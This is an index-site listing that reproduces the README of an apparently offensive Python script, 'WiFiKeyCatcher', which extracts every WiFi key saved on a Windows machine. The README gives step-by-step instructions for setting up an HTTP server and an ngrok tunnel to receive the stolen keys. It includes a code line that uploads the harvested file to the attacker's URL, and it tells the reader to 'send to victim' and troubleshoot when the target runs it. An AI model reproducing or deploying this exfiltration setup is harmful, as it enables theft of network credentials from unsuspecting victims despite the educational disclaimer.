An open API service indexing awesome lists of open source software.

https://github.com/ibnaleem/wifikeycatcher

A Python Script That Extracts All WiFi Keys Saved on Windows OS
https://github.com/ibnaleem/wifikeycatcher

hacking-tool hacking-tools offensive-scripts redteam redteam-tools redteaming wifi-hacking wifi-hotspot wifi-network wifi-password wifi-security windows windows-10

Last synced: 2 months ago
JSON representation

A Python Script That Extracts All WiFi Keys Saved on Windows OS

Awesome Lists containing this project

README

          





⚠️ Disclaimer: This repository is intended for educational purposes exclusively. I bear no responsibility for any illicit or unauthorized use of this project.





# Setup
1. Clone this repository:
```
$ git clone https://github.com/ibnaleem/WiFiKeyCatcher.git
```
2. Run `HTTPServer`:
```
$ py -m http.server
```
3. [Install ngrok](https://ngrok.com/download)
4. Configure auth-token in terminal:
```
$ ngrok config add-authtoken
```
5. Start tunnel on port 8000:
```
$ ngrok http 8000
```
If successful, you should see all of your system directories as embeded links.

6. Copy ngrok URL and paste into `main.py` (line 52):
```python
url = "https://ngrok-url-here"
files = {'file': open(f'{curr_path}.txt', 'rb')}
```

Save and send to victim. Note: ngrok must be running to obtain WiFi-Keys

#### Target Ran Script, Nothing Received
Make sure your target has Python installed, and you're running HTTP server + ngrok